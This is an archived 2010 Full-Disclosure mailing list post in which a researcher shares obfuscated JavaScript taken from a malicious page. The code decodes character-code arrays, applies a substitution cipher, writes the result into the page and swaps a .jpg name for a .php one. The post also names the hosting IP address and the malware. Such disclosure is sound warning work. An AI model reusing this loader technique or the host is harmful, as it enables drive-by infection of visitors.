| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <054ECEF7F2B22543BF034FB083E5AB0B18801BB985@Lin0038.RosenInspection.net>
Date: Mon, 22 Feb 2010 15:12:26 +0100
From: Stephan Gerling <SGerling@...enInspection.net>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Some nice code yust captured
Dear all,
I just get a information by a scared user about something strange on his computer.
I investigate and found this script.
----------------------from the index.html-------------------------------
#alert {
z-index:1300;
width:434px;
height:332px;
position:absolute;
display:none;
cursor:hand;
background:url(/res/1/1/images/alert.gif);
} </style>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
<script type="text/javascript">
var y2c2a2ff = ["s","x","Z","f","B","U","X","J","W","N","c","C","O","G","T","I","P","S","D","h","F","k","Q","y","u","w","b","r","o","j","q","l","m","t","z","A","E","i","M","L","p","n","g","Y","e","V","R","v","H","a","d","K"], z2c2a2ff = 9;
var dl_d7e9ccb94 = 'd_d7e9cc.jpg';
var cc = 1, ee = 1;
(function() {
dl_d7e9ccb94 = dl_d7e9ccb94.replace(/\.jpg/, '.php');
var temp="",i,pass2 = "",sou="";
var x2c2a = "60)^$,78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,32)^$,103)^$,10
-----cut off------
seems like ascii codes
/-------cut off------
Continue of the script
78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,62)^$,";
temp = x2c2a.split(")^$,");
for (var i in temp) {
pass2 += String.fromCharCode(temp[i]);
}
pass2 = pass2.replace(/\&/g,'&');
pass2 = pass2.replace(/\</g,'<');
pass2 = pass2.replace(/\>/g,'>');
pass2 = pass2.replace(/\"/g,'"');
var pass1 = "";
temp = pass2.split("");
for (var i in temp) {
sou += f2c2a2ff7f(temp[i]);
}
document.write(sou);
})();
function f2c2a2ff7f(s_in){
var index = $.inArray(s_in, y2c2a2ff);
if(index >= 0){
var new_index = (index - z2c2a2ff) < 0 ? y2c2a2ff.length - (z2c2a2ff - index) : index - z2c2a2ff;
return y2c2a2ff[new_index];
}
return s_in;
}
</script>
<script type="text/javascript">
(function($) {
if ($.browser.mozilla) {
$.fn.disableTextSelect = function() {
return this.each(function() {
$(this).css({
'MozUserSelect' : 'none'
});
});
};
$.fn.enableTextSelect = function() {
return this.each(function() {
$(this).css({
'MozUserSelect' : ''
});
});
};
} else if ($.browser.msie) {
$.fn.disableTextSelect = function() {
return this.each(function() {
$(this).bind('selectstart.disableTextSelect', function() {
return false;
});
});
};
$.fn.enableTextSelect = function() {
return this.each(function() {
$(this).unbind('selectstart.disableTextSelect');
});
};
} else {
$.fn.disableTextSelect = function() {
return this.each(function() {
$(this).bind('mousedown.disableTextSelect', function() {
return false;
});
});
};
$.fn.enableTextSelect = function() {
return this.each(function() {
$(this).unbind('mousedown.disableTextSelect');
});
};
}
})(jQuery);
</script>
</head>
<body>
</body>
</html>
If you open this webpage http : / / 217.23.5.205 / index.ht......
You will be infected with Virus/Malware: Cryp_Krap-9
Best regards,
Stephan Gerling
May the force be with you
-------------------------
Obi-Wan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists